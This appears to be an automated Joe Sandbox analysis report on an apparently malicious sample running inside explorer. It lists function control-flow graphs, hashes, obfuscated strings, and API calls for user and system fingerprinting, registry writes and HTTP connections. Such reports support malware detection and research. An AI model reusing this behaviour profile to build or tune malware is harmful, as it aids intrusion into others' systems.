                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                  • String ID: QL0M$QN0u hA=$QS y9XNo$RLOKSv==$Tc DaB5n$US B8B5s
                                                  • API String ID: 3951112935-477335935
                                                  • Opcode ID: 946cba13dd55d49cb5c422032f65adcc8850c7e08ef7959b019b32c8c12ab19b
                                                  • Instruction ID: 45cb2e95e8a4091a768a2e597e0c853560d80c2ae60eb62cb1494cecad249cd7
                                                  • Opcode Fuzzy Hash: 946cba13dd55d49cb5c422032f65adcc8850c7e08ef7959b019b32c8c12ab19b
                                                  • Instruction Fuzzy Hash: 8E920872A202549BDB28DBB8CD887DDFB76AF45310F248318E411AF3D6D7758AC88B51
                                                  Function 0320E8D0 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 764comCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2134 320e8d0-320e94a GetUserNameA 2135 320e951-320e956 2134->2135 2135->2135 2136 320e958-320ec5c call 3224250 call 3226270 call 3226610 call 3226270 call 3226610 call 3223340 call 3226270 call 3226610 call 3226270 call 3226610 call 3226270 call 3226610 CoInitialize 2135->2136 2161 320ec87 2136->2161 2162 320ec5e-320ec7b CoCreateInstance 2136->2162 2165 320ec89-320ec92 2161->2165 2163 320ec81 CoUninitialize 2162->2163 2164 320f00d-320f033 2162->2164 2163->2161 2175 320f039-320f03e 2164->2175 2176 320f0de-320f1b1 call 322b650 call 3231df3 call 322ecf7 call 3202400 2164->2176 2166 320ec94-320eca9 2165->2166 2167 320ecc9-320ecef 2165->2167 2169 320ecab-320ecb9 2166->2169 2170 320ecbf-320ecc6 call 322a036 2166->2170 2171 320ecf1-320ed06 2167->2171 2172 320ed26-320ed4c 2167->2172 2169->2170 2177 320f48d call 322f02c 2169->2177 2170->2167 2179 320ed08-320ed16 2171->2179 2180 320ed1c-320ed23 call 322a036 2171->2180 2173 320ed83-320eda9 2172->2173 2174 320ed4e-320ed63 2172->2174 2183 320edda-320edfe 2173->2183 2184 320edab-320edba 2173->2184 2181 320ed65-320ed73 2174->2181 2182 320ed79-320ed80 call 322a036 2174->2182 2175->2161 2185 320f044-320f053 2175->2185 2276 320f1b4-320f1b9 2176->2276 2196 320f492 call 322f02c 2177->2196 2179->2177 2179->2180 2180->2172 2181->2177 2181->2182 2182->2173 2193 320ee00-320ee15 2183->2193 2194 320ee35-320ee5b 2183->2194 2190 320edd0-320edd7 call 322a036 2184->2190 2191 320edbc-320edca 2184->2191 2211 320f055-320f067 CoUninitialize 2185->2211 2212 320f06c-320f0d9 CoUninitialize call 3223340 * 4 call 320e8d0 2185->2212 2190->2183 2191->2177 2191->2190 2203 320ee17-320ee25 2193->2203 2204 320ee2b-320ee32 call 322a036 2193->2204 2198 320ee92-320eeb8 2194->2198 2199 320ee5d-320ee72 2194->2199 2205 320f497 call 322f02c 2196->2205 2208 320eee9-320ef0a 2198->2208 2209 320eeba-320eec9 2198->2209 2206 320ee74-320ee82 2199->2206 2207 320ee88-320ee8f call 322a036 2199->2207 2203->2177 2203->2204 2204->2194 2223 320f49c-320f4a1 call 322f02c 2205->2223 2206->2177 2206->2207 2207->2198 2220 320ef38-320ef50 2208->2220 2221 320ef0c-320ef18 2208->2221 2218 320eecb-320eed9 2209->2218 2219 320eedf-320eee6 call 322a036 2209->2219 2211->2161 2212->2165 2218->2177 2218->2219 2219->2208 2224 320ef52-320ef5e 2220->2224 2225 320ef7e-320ef96 2220->2225 2230 320ef1a-320ef28 2221->2230 2231 320ef2e-320ef35 call 322a036 2221->2231 2236 320ef60-320ef6e 2224->2236 2237 320ef74-320ef7b call 322a036 2224->2237 2238 320efc4-320efdc 2225->2238 2239 320ef98-320efa4 2225->2239 2230->2177 2230->2231 2231->2220 2236->2177 2236->2237 2237->2225 2241 320efe2-320efee 2238->2241 2242 320f46f-320f48c call 32299c0 2238->2242 2248 320efa6-320efb4 2239->2248 2249 320efba-320efc1 call 322a036 2239->2249 2250 320eff4-320f002 2241->2250 2251 320f465-320f46c call 322a036 2241->2251 2248->2177 2248->2249 2249->2238 2250->2177 2256 320f008 2250->2256 2251->2242 2256->2251 2276->2276 2277 320f1bb-320f1fa call 3224250 call 3231e8f 2276->2277 2282 320f22b-320f27d call 3231df3 call 322ecf7 call 3202400 2277->2282 2283 320f1fc-320f20b 2277->2283 2294 320f280-320f285 2282->2294 2284 320f221-320f228 call 322a036 2283->2284 2285 320f20d-320f21b 2283->2285 2284->2282 2285->2196 2285->2284 2294->2294 2295 320f287-320f2c6 call 3224250 call 3231e8f 2294->2295 2300 320f2f7-320f34d call 3231df3 call 322ecf7 call 3202400 2295->2300 2301 320f2c8-320f2d7 2295->2301 2312 320f350-320f355 2300->2312 2302 320f2d9-320f2e7 2301->2302 2303 320f2ed-320f2f4 call 322a036 2301->2303 2302->2205 2302->2303 2303->2300 2312->2312 2313 320f357-320f396 call 3224250 call 3231e8f 2312->2313 2318 320f3c7-320f460 CoUninitialize 2313->2318 2319 320f398-320f3a7 2313->2319 2318->2165 2320 320f3a9-320f3b7 2319->2320 2321 320f3bd-320f3c4 call 322a036 2319->2321 2320->2223 2320->2321 2321->2318
                                                  APIs
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0320E91D
                                                  • CoInitialize.OLE32(00000000), ref: 0320EC54
                                                  • CoCreateInstance.OLE32(0325DFA8,00000000,00000001,0325E008,?), ref: 0320EC73
                                                  • CoUninitialize.OLE32 ref: 0320EC81
                                                  • CoUninitialize.OLE32 ref: 0320F055
                                                  • CoUninitialize.OLE32 ref: 0320F06C
                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0320F455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Uninitialize$CreateInitializeInstanceNameUser
                                                  • String ID: @3P$DGpyINWmPT4=$LI1Szb==$LI1yINWm$Uu YSv==$axS5 CIZPzb=$axS5 ykoPx==
                                                  • API String ID: 1775936440-192416382
                                                  • Opcode ID: dd8e76a371f646c6179158413eb40f03ba1978f2fc407a559be2c97d1556b2b1
                                                  • Instruction ID: 9e3d22482d2e3a323264e305eaf0ef04521511c1d7ad2ec03ba2732a982e6709
                                                  • Opcode Fuzzy Hash: dd8e76a371f646c6179158413eb40f03ba1978f2fc407a559be2c97d1556b2b1
                                                  • Instruction Fuzzy Hash: CA627F71A10258ABDF24DF24CD88BDDBB79AF49304F1085D8E409AB291DB759BC8CF51
                                                  Function 032093D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2404 32093d0-3209452 call 322b650 GetVersionExW 2407 32099f6-3209a13 call 32299c0 2404->2407 2408 3209458-3209480 call 3223340 call 32061f0 2404->2408 2415 3209482 2408->2415 2416 3209484-32094a6 call 3223340 call 32061f0 2408->2416 2415->2416 2421 32094a8 2416->2421 2422 32094aa-32094c3 GetModuleHandleA GetProcAddress 2416->2422 2421->2422 2423 32094f4-320951f 2422->2423 2424 32094c5-32094d4 2422->2424 2427 3209550-3209571 2423->2427 2428 3209521-3209530 2423->2428 2425 32094d6-32094e4 2424->2425 2426 32094ea-32094f1 call 322a036 2424->2426 2425->2426 2429 3209a14 2425->2429 2426->2423 2433 3209573-3209575 GetNativeSystemInfo 2427->2433 2434 3209577 GetSystemInfo 2427->2434 2431 3209532-3209540 2428->2431 2432 3209546-320954d call 322a036 2428->2432 2437 3209a19-3209aa1 call 322f02c call 322b650 GetVersionExW 2429->2437 2438 3209a14 call 322f02c 2429->2438 2431->2429 2431->2432 2432->2427 2439 320957d-3209586 2433->2439 2434->2439 2471 3209aa3-3209aa8 2437->2471 2472 3209aad-3209ad5 call 3223340 call 32061f0 2437->2472 2438->2437 2442 32095a4-32095a7 2439->2442 2443 3209588-320958f 2439->2443 2446 3209997-320999a 2442->2446 2447 32095ad-32095b6 2442->2447 2444 32099f1 2443->2444 2445 3209595-320959f 2443->2445 2444->2407 2449 32099ec 2445->2449 2446->2444 2452 320999c-32099a5 2446->2452 2450 32095b8-32095c4 2447->2450 2451 32095c9-32095cc 2447->2451 2449->2444 2450->2449 2454 32095d2-32095d9 2451->2454 2455 3209974-3209976 2451->2455 2456 32099a7-32099ab 2452->2456 2457 32099cc-32099cf 2452->2457 2461 32096b9-320995d call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 2454->2461 2462 32095df-3209647 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 2454->2462 2459 3209984-3209987 2455->2459 2460 3209978-3209982 2455->2460 2463 32099c0-32099ca 2456->2463 2464 32099ad-32099b2 2456->2464 2466 32099d1-32099db 2457->2466 2467 32099dd-32099e9 2457->2467 2459->2444 2468 3209989-3209995 2459->2468 2460->2449 2534 3209963-320996c 2461->2534 2505 3209649 2462->2505 2506 320964b-320966b call 3231e8f 2462->2506 2463->2444 2464->2463 2470 32099b4-32099be 2464->2470 2466->2444 2467->2449 2468->2449 2470->2444 2476 3209bef-3209c0b call 32299c0 2471->2476 2490 3209ad7 2472->2490 2491 3209ad9-3209afb call 3223340 call 32061f0 2472->2491 2490->2491 2508 3209afd 2491->2508 2509 3209aff-3209b18 GetModuleHandleA GetProcAddress 2491->2509 2505->2506 2523 32096a2-32096a4 2506->2523 2524 320966d-320967c 2506->2524 2508->2509 2512 3209b49-3209b74 2509->2512 2513 3209b1a-3209b29 2509->2513 2514 3209ba1-3209bc2 2512->2514 2515 3209b76-3209b85 2512->2515 2518 3209b2b-3209b39 2513->2518 2519 3209b3f-3209b46 call 322a036 2513->2519 2525 3209bc4-3209bc6 2514->2525 2526 3209bc8 GetSystemInfo 2514->2526 2521 3209b97-3209b9e call 322a036 2515->2521 2522 3209b87-3209b95 2515->2522 2518->2519 2528 3209c0c-3209c11 call 322f02c 2518->2528 2519->2512 2521->2514 2522->2521 2522->2528 2523->2534 2535 32096aa-32096b4 2523->2535 2531 3209692-320969f call 322a036 2524->2531 2532 320967e-320968c 2524->2532 2537 3209bce-3209bd5 2525->2537 2526->2537 2531->2523 2532->2437 2532->2531 2534->2446 2543 320996e 2534->2543 2535->2534 2537->2476 2544 3209bd7-3209bdf 2537->2544 2543->2455 2547 3209be1-3209be6 2544->2547 2548 3209be8-3209beb 2544->2548 2547->2476 2548->2476 2549 3209bed 2548->2549 2549->2476
                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209577
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                  • String ID: M BCKb==$M BCLL==$M BDJb==$M BDKL==
                                                  • API String ID: 374719553-1883779511
                                                  • Opcode ID: 2749c51a43269837b9d70a84255ecf09d2f86b785b9b1e8016e9406e01c68fc9
                                                  • Instruction ID: 57018f7bc8beaa0766c33289341297cb73ae892b9a2d123167c22ba106b6664d
                                                  • Opcode Fuzzy Hash: 2749c51a43269837b9d70a84255ecf09d2f86b785b9b1e8016e9406e01c68fc9
                                                  • Instruction Fuzzy Hash: 2A022375E20244ABCB14FB28DC5A79EBB71EB45720F54429CD8426B3C3DB754AD88BC2
                                                  Function 0323E98E Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 330timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2597 323e98e-323e9c0 call 323e55d call 323e563 call 323e5c1 2604 323e9c6-323e9d2 call 323e569 2597->2604 2605 323ec24-323ec5f call 322f049 call 323e55d call 323e563 call 323e5c1 2597->2605 2604->2605 2610 323e9d8-323e9e2 2604->2610 2635 323ec65-323ec71 call 323e569 2605->2635 2636 323ed7e-323edda call 322f049 call 3246697 2605->2636 2612 323e9e4 2610->2612 2613 323ea19-323ea1b 2610->2613 2615 323e9e6-323e9ec 2612->2615 2616 323ea1e-323ea27 2613->2616 2619 323e9ee-323e9f1 2615->2619 2620 323ea0c-323ea0e 2615->2620 2616->2616 2621 323ea29-323ea3f call 32383e5 2616->2621 2623 323e9f3-323e9fb 2619->2623 2624 323ea08-323ea0a 2619->2624 2625 323ea11-323ea13 2620->2625 2632 323ec16-323ec1c call 32381b6 2621->2632 2633 323ea45-323ea60 call 32381b6 2621->2633 2623->2620 2628 323e9fd-323ea06 2623->2628 2624->2625 2625->2613 2629 323ec1d-323ec21 2625->2629 2628->2615 2628->2624 2632->2629 2642 323ea63-323ea6d 2633->2642 2635->2636 2646 323ec77-323ec83 call 323e595 2635->2646 2657 323ede4-323ede7 2636->2657 2658 323eddc-323ede2 2636->2658 2642->2642 2645 323ea6f-323ea83 call 323c669 2642->2645 2654 323ec22 2645->2654 2655 323ea89-323eadb call 322b650 * 4 call 323e947 2645->2655 2646->2636 2656 323ec89-323ecaa call 32381b6 GetTimeZoneInformation 2646->2656 2654->2605 2716 323eadc-323eadf 2655->2716 2674 323ecb0-323ecd0 2656->2674 2675 323ed5b-323ed7d call 323e557 call 323e54b call 323e551 2656->2675 2662 323ede9-323edeb 2657->2662 2663 323eded-323ee00 call 32383e5 2657->2663 2659 323ee31-323ee43 2658->2659 2664 323ee53 2659->2664 2665 323ee45-323ee48 2659->2665 2662->2659 2677 323ee02 2663->2677 2678 323ee0c-323ee25 call 3246697 2663->2678 2671 323ee58-323ee6d call 32381b6 call 32299c0 2664->2671 2672 323ee53 call 323ec2f 2664->2672 2665->2664 2669 323ee4a-323ee51 call 323e98e 2665->2669 2669->2671 2672->2671 2682 323ecd2-323ecd7 2674->2682 2683 323ecda-323ece2 2674->2683 2687 323ee03-323ee0a call 32381b6 2677->2687 2703 323ee27-323ee28 2678->2703 2704 323ee2a-323ee2b call 32381b6 2678->2704 2682->2683 2684 323ecf4-323ecf6 2683->2684 2685 323ece4-323eceb 2683->2685 2693 323ecf8-323ed58 call 322b650 * 4 call 3232a17 call 323ee6e * 2 2684->2693 2685->2684 2692 323eced-323ecf2 2685->2692 2707 323ee30 2687->2707 2692->2693 2693->2675 2703->2687 2704->2707 2707->2659 2718 323eae1 2716->2718 2719 323eae4-323eae7 2716->2719 2718->2719 2719->2716 2721 323eae9-323eaf7 2719->2721 2723 323eaf9 2721->2723 2724 323eafc-323eb11 call 3231bc1 2721->2724 2723->2724 2730 323eb14-323eb1a 2724->2730 2732 323eb25-323eb28 2730->2732 2733 323eb1c-323eb23 2730->2733 2732->2730 2733->2732 2736 323eb2a-323eb30 2733->2736 2738 323eb36-323eb61 call 3231bc1 2736->2738 2739 323ebca-323ebd1 2736->2739 2747 323eb83-323eb89 2738->2747 2748 323eb63-323eb67 2738->2748 2740 323ebd3-323ebd5 2739->2740 2741 323ebd8-323ebe9 2739->2741 2740->2741 2743 323ec05-323ec14 call 323e557 call 323e54b 2741->2743 2744 323ebeb-323ec02 call 323e947 2741->2744 2743->2632 2744->2743 2747->2739 2753 323eb8b-323ebae call 3231bc1 2747->2753 2751 323eb68-323eb6e 2748->2751 2754 323eb80 2751->2754 2755 323eb70-323eb7e 2751->2755 2753->2739 2760 323ebb0-323ebb4 2753->2760 2754->2747 2755->2751 2755->2754 2761 323ebb5-323ebb8 2760->2761 2762 323ebc7 2761->2762 2763 323ebba-323ebc5 2761->2763 2762->2739 2763->2761 2763->2762
                                                  APIs
                                                  • _free.LIBCMT ref: 0323EA4B
                                                  • _free.LIBCMT ref: 0323EC17
                                                  • _free.LIBCMT ref: 0323EC8F
                                                  • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$InformationTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 597776487-239921721
                                                  • Opcode ID: 9ea5dcc96b3b26d29e73c2e89e1d51ef53751c9962f17048e5ab19189a838ddb
                                                  • Instruction ID: 6545d7dd8172df8763805cf16cd2abc0f815ab6f167933f1e81c041f0fb60f3f
                                                  • Opcode Fuzzy Hash: 9ea5dcc96b3b26d29e73c2e89e1d51ef53751c9962f17048e5ab19189a838ddb
                                                  • Instruction Fuzzy Hash: 2AA12CF7920315ABCF10FF64DC45AAE7B7DEF46610F154066E905AB280EB709AC9C790
                                                  Function 032091B0 Relevance: 6.3, APIs: 4, Instructions: 324libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3592 32091b0-320921a 3593 3209220-3209227 3592->3593 3594 32092f3 3592->3594 3596 3209230-3209247 3593->3596 3595 32092f5-32092fb 3594->3595 3597 320932c-3209332 3595->3597 3598 32092fd-3209309 3595->3598 3599 32093bd call 3224760 3596->3599 3600 320924d-320926e call 3224250 3596->3600 3605 3209334-320933f 3597->3605 3606 320935b-3209373 3597->3606 3601 320930b-3209319 3598->3601 3602 320931f-3209329 call 322a036 3598->3602 3607 32093c2-3209452 call 322f02c call 322b650 GetVersionExW 3599->3607 3616 3209270-320927e 3600->3616 3617 320929e-32092e2 call 3225bd0 3600->3617 3601->3602 3601->3607 3602->3597 3610 3209351-3209358 call 322a036 3605->3610 3611 3209341-320934f 3605->3611 3612 3209375-3209381 3606->3612 3613 320939d-32093bc call 32299c0 3606->3613 3638 32099f6-3209a13 call 32299c0 3607->3638 3639 3209458-3209480 call 3223340 call 32061f0 3607->3639 3610->3606 3611->3607 3611->3610 3620 3209393-320939a call 322a036 3612->3620 3621 3209383-3209391 3612->3621 3624 3209280-320928e 3616->3624 3625 3209294-320929b call 322a036 3616->3625 3617->3595 3635 32092e4-32092e9 3617->3635 3620->3613 3621->3607 3621->3620 3624->3607 3624->3625 3625->3617 3635->3594 3637 32092eb-32092ee 3635->3637 3637->3596 3646 3209482 3639->3646 3647 3209484-32094a6 call 3223340 call 32061f0 3639->3647 3646->3647 3652 32094a8 3647->3652 3653 32094aa-32094c3 GetModuleHandleA GetProcAddress 3647->3653 3652->3653 3654 32094f4-320951f 3653->3654 3655 32094c5-32094d4 3653->3655 3658 3209550-3209571 3654->3658 3659 3209521-3209530 3654->3659 3656 32094d6-32094e4 3655->3656 3657 32094ea-32094f1 call 322a036 3655->3657 3656->3657 3660 3209a14 3656->3660 3657->3654 3664 3209573-3209575 GetNativeSystemInfo 3658->3664 3665 3209577 GetSystemInfo 3658->3665 3662 3209532-3209540 3659->3662 3663 3209546-320954d call 322a036 3659->3663 3668 3209a19-3209aa1 call 322f02c call 322b650 GetVersionExW 3660->3668 3669 3209a14 call 322f02c 3660->3669 3662->3660 3662->3663 3663->3658 3670 320957d-3209586 3664->3670 3665->3670 3702 3209aa3-3209aa8 3668->3702 3703 3209aad-3209ad5 call 3223340 call 32061f0 3668->3703 3669->3668 3673 32095a4-32095a7 3670->3673 3674 3209588-320958f 3670->3674 3677 3209997-320999a 3673->3677 3678 32095ad-32095b6 3673->3678 3675 32099f1 3674->3675 3676 3209595-320959f 3674->3676 3675->3638 3680 32099ec 3676->3680 3677->3675 3683 320999c-32099a5 3677->3683 3681 32095b8-32095c4 3678->3681 3682 32095c9-32095cc 3678->3682 3680->3675 3681->3680 3685 32095d2-32095d9 3682->3685 3686 3209974-3209976 3682->3686 3687 32099a7-32099ab 3683->3687 3688 32099cc-32099cf 3683->3688 3692 32096b9-320995d call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 call 3223340 call 32061f0 call 32091b0 3685->3692 3693 32095df-3209647 call 3223340 call 32061f0 call 3223340 call 32061f0 call 3206320 3685->3693 3690 3209984-3209987 3686->3690 3691 3209978-3209982 3686->3691 3694 32099c0-32099ca 3687->3694 3695 32099ad-32099b2 3687->3695 3697 32099d1-32099db 3688->3697 3698 32099dd-32099e9 3688->3698 3690->3675 3699 3209989-3209995 3690->3699 3691->3680 3765 3209963-320996c 3692->3765 3736 3209649 3693->3736 3737 320964b-320966b call 3231e8f 3693->3737 3694->3675 3695->3694 3701 32099b4-32099be 3695->3701 3697->3675 3698->3680 3699->3680 3701->3675 3707 3209bef-3209c0b call 32299c0 3702->3707 3721 3209ad7 3703->3721 3722 3209ad9-3209afb call 3223340 call 32061f0 3703->3722 3721->3722 3739 3209afd 3722->3739 3740 3209aff-3209b18 GetModuleHandleA GetProcAddress 3722->3740 3736->3737 3754 32096a2-32096a4 3737->3754 3755 320966d-320967c 3737->3755 3739->3740 3743 3209b49-3209b74 3740->3743 3744 3209b1a-3209b29 3740->3744 3745 3209ba1-3209bc2 3743->3745 3746 3209b76-3209b85 3743->3746 3749 3209b2b-3209b39 3744->3749 3750 3209b3f-3209b46 call 322a036 3744->3750 3756 3209bc4-3209bc6 3745->3756 3757 3209bc8 GetSystemInfo 3745->3757 3752 3209b97-3209b9e call 322a036 3746->3752 3753 3209b87-3209b95 3746->3753 3749->3750 3759 3209c0c-3209c11 call 322f02c 3749->3759 3750->3743 3752->3745 3753->3752 3753->3759 3754->3765 3766 32096aa-32096b4 3754->3766 3762 3209692-320969f call 322a036 3755->3762 3763 320967e-320968c 3755->3763 3768 3209bce-3209bd5 3756->3768 3757->3768 3762->3754 3763->3668 3763->3762 3765->3677 3774 320996e 3765->3774 3766->3765 3768->3707 3775 3209bd7-3209bdf 3768->3775 3774->3686 3778 3209be1-3209be6 3775->3778 3779 3209be8-3209beb 3775->3779 3778->3707 3779->3707 3780 3209bed 3779->3780 3780->3707
                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                  • String ID:
                                                  • API String ID: 2167034304-0
                                                  • Opcode ID: c635774f0fcd9190f45ea10c64491f3499850b7b8fd96807c2359a96b08ceb52
                                                  • Instruction ID: 08d6ae0592e0df3258763ebb6387eb5cf5e4b051e3a53da6152909672b10164e
                                                  • Opcode Fuzzy Hash: c635774f0fcd9190f45ea10c64491f3499850b7b8fd96807c2359a96b08ceb52
                                                  • Instruction Fuzzy Hash: F4C1E472E20204AFDB14DF68CC84B9EFB79EB49310F548258E8159B2D7DB759AC4CB90
                                                  Function 0321E870 Relevance: 51.4, APIs: 4, Strings: 24, Instructions: 2430registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 032105B0: Sleep.KERNELBASE(000005DC,74D40A26,?,00000000), ref: 03210642
                                                    • Part of subcall function 032105B0: InternetOpenW.WININET(0325DB50,00000000,00000000,00000000,00000000), ref: 03210651
                                                    • Part of subcall function 032105B0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 03210675
                                                    • Part of subcall function 032105B0: HttpOpenRequestA.WININET(?,00000000), ref: 032106BF
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                  • RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • GetUserNameA.ADVAPI32(?,80000002), ref: 0321F632
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0321F6BD
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                    • Part of subcall function 032061F0: GdiplusStartup.GDIPLUS(?,?,00000000,74D40A26,00000000), ref: 03206DEA
                                                    • Part of subcall function 032061F0: GetDC.USER32(00000000), ref: 03206F62
                                                  Strings
                                                  Memory Dump Source
